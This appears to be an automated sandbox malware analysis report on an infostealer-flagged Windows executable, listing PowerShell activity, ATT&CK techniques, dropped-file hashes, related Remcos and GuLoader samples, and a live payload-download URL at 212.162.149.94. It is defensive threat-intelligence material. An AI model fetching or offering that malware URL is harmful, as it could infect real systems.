    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004061A0
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    1
    Encrypted Channel
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    PowerShell
    Boot or Logon Initialization Scripts311
    Process Injection
    21
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Process Discovery
    Remote Desktop Protocol1
    Clipboard Data
    3
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    1
    Access Token Manipulation
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
    Process Injection
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture12
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Software Packing
    LSA Secrets2
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain Credentials14
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    rArz0wnYVU.exe24%ReversingLabsWin32.Infostealer.Babar
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin40%Avira URL Cloudsafe
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binf0%Avira URL Cloudsafe
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin10%Avira URL Cloudsafe
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binT0%Avira URL Cloudsafe
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binGl0%Avira URL Cloudsafe
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin=mS0%Avira URL Cloudsafe
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binL0%Avira URL Cloudsafe
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binS0%Avira URL Cloudsafe
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin:#0%Avira URL Cloudsafe
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin100%Avira URL Cloudmalware
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binB0%Avira URL Cloudsafe
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin$0%Avira URL Cloudsafe
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binD0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binfalse
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binSmsiexec.exe, 00000005.00000002.3884234699.00000000047EC000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin4msiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binTmsiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binGlmsiexec.exe, 00000005.00000002.3884234699.00000000047AA000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin1msiexec.exe, 00000005.00000002.3884234699.00000000047EC000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binLmsiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binlmsiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binfmsiexec.exe, 00000005.00000002.3884234699.00000000047EC000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin=mSmsiexec.exe, 00000005.00000002.3884234699.00000000047AA000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin:#msiexec.exe, 00000005.00000002.3884234699.00000000047EC000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binBmsiexec.exe, 00000005.00000002.3884234699.00000000047EC000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin$msiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binDmsiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bindmsiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://nsis.sf.net/NSIS_ErrorErrorrArz0wnYVU.exefalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          212.162.149.94
          unknownNetherlands
          64236UNREAL-SERVERSUSfalse
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1586025
          Start date and time:2025-01-08 16:28:21 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 52s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:rArz0wnYVU.exe
          renamed because original name is a hash value
          Original Sample Name:0a2bf76a4014ebafcf6a15f5a3e7f8ea1e2e058b4c7efbfab930454fe9cf150d.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@17/14@0/1
          EGA Information:
          • Successful, ratio: 50%
          HCA Information:
          • Successful, ratio: 94%
          • Number of executed functions: 48
          • Number of non-executed functions: 26
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45, 23.1.237.91, 4.175.87.197
          • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: rArz0wnYVU.exe
          No simulations
          No context
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          UNREAL-SERVERSUSRFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
          • 212.162.149.92
          Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • 162.251.122.87
          Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • 162.251.122.87
          Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • 162.251.122.87
          WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
          • 162.251.122.87
          RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • 212.162.149.89
          purchase.order.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • 212.162.149.66
          Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • 212.162.149.66
          order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
          • 212.162.149.89
          No context
          No context
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:modified
          Size (bytes):53158
          Entropy (8bit):5.062687652912555
          Encrypted:false
          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
          MD5:5D430F1344CE89737902AEC47C61C930
          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Users\user\Desktop\rArz0wnYVU.exe
          File Type:data
          Category:dropped
          Size (bytes):2534903
          Entropy (8bit):0.15900785684041077
          Encrypted:false
          SSDEEP:768:in/JhYyw/q/BDpwIMbz4RwUe+jBFimAULkDI9hPu+xhz3pJKKXKfDlm16iGhgU06:iN
          MD5:7F13B0BD78AEE1B268D0BA6D76FF4CAC
          SHA1:E25E1B852C3F5AEE26C9A0981A086F9DB9E8EA14
          SHA-256:FDFC91B930DC717A055C4C972025FABD952FF6FA8CEB0AB070A9158244AD3372
          SHA-512:93C83FEF3520FE66C3970776C7AEA0D75EEBE689AF04B9BDFEDA1F16CA2528F53DA44B817CEE3F73A695E262C0AE09AAB1154E31120339A571CDECE4F47AF90E
          Malicious:false
          Preview:......................................................................................................................................................................................................................................................................................................................................h...............................................................................................................................................................................................................................................................................................................................................................................7...................j....................................................>..................................................................................................................................................................................................................................=.....
          Process:C:\Users\user\Desktop\rArz0wnYVU.exe
          File Type:data
          Category:dropped
          Size (bytes):5520543
          Entropy (8bit):0.15938460007902674
          Encrypted:false
          SSDEEP:768:Ray8B+XsJO5nLtNo9/o2T5jNB72M7DvpRWWU+W+e7a/5AQ44f1JkNqNztNCXBVw9:M
          MD5:52100F853FD63BB78800A46DC377177A
          SHA1:40317BDE9E0BBCF258EB691092AEC56B44F08584
          SHA-256:9350AE792A4907298E82CE0CF0379E802CB2D1E26AD43E1EBF7D248BB5CB10EF
          SHA-512:D764BEF597047028215FBA9F38AB1C66CC7DF761367DB6EA73F1B4B6902F9E5FB3FD373451C844224A690D871C99C10AECB039FCD50DE75ACD8096182B0CA47D
          Malicious:false
          Preview:.......................................................................................................................................................Y...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W............................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\rArz0wnYVU.exe
          File Type:data
          Category:dropped
          Size (bytes):322222
          Entropy (8bit):7.61896280884411
          Encrypted:false
          SSDEEP:6144:Du+075pguwLMjV24F8uATy8E0ydtyRQ9f363qY:Du+0ptVV24+uA+f0ydkofq/
          MD5:28CFCB7B5BADC3F33F8DA688631A4CE5
          SHA1:4982A06C7B6A07358011D3162E2583C00B00212D
          SHA-256:0E6CC5EF4A764ACAC5AFF01DB0B9CCDBBDB85856491C189C5D6DCE987EDDC8A4
          SHA-512:F51B614E875E5980B2683A2AF5FD73D43566D0B6FF8A28A28B78934E4F6DAC315A3258A9841D3618D0BD16887BFCBE26A14900C3D77DCA32D9F01A4C2CFBB923
          Malicious:false
          Preview:.....j..8.....0.H.\...11.=....e.bb..X...............?.....UU........................................)..M...........``.`.....H..............).................|........../...............r...............BBBBB......... ...|..........k........X.>>>............./..||||...DD..........G...[[[...................,,..!.....z......................YYY......1.........ooo....H.............W...........i...Z...........ll..h..j............2.VV.....f....................II...-...............................q.......................c............::......AAAA.....J.....v.........KK.[[[...................................................................................SSS.eee...................FF...$$...............)......................................fff.................L.........................99...W...........7........=.t....::..................i..B.))))).kkk...........((....LLL."..77..............qq...q..***..X....^^..............###.........q.vv.....NN.UU.....`..............000................p......
          Process:C:\Users\user\Desktop\rArz0wnYVU.exe
          File Type:Unicode text, UTF-8 text, with very long lines (4263), with CRLF, LF line terminators
          Category:dropped
          Size (bytes):74753
          Entropy (8bit):5.181835151811227
          Encrypted:false
          SSDEEP:1536:VMF9b2e9C0sHEz7enA9yXRO/YaYP+DrOr1jKlqdox4G6iza6A:VMrjC0Rn8XT4O5jK8dOyim6A
